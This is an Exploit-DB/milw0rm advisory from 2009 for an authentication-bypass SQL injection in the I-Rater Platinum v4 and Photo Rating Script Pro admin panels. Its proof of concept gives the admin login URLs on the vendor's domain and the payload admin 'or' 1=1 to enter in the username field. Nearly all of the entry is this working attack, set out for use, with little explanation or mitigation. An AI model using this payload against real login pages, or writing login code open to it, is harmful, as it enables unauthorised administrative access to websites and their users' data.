I-Rater Pro/Plantinum 4.0 - Auth Bypass SQL Injection Vulnerability

2009-04-21T00:00:00
ID EDB-ID:8508
Type exploitdb
Reporter Hakxer
Modified 2009-04-21T00:00:00

Description

I-Rater Pro/Plantinum v4 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ################################################
###########  I-Rater Platinum V4 ###############
##### By : Hakxer
##### Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Stealth , Kof2002 , Data_fr34ck3r , HcJ , Virus_hima
########## I-Rater Platinum V4 (Auth bypass) Sql injection

poc :

http://www.i-rater.com/platinumadmin.html

in username : admin 'or' 1=1
in password :
###############################

################################################
###########  Photo Rating Script Pro ###########
##### By : Hakxer
##### Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Stealth , Kof2002 , Data_fr34ck3r , HcJ , Virus_hima
########## Photo Rating Script Pro (Auth bypass) Sql injection

poc :

http://www.i-rater.com/pro/admin/login.php

in username : admin 'or' 1=1
in password :
###############################

# milw0rm.com [2009-04-21]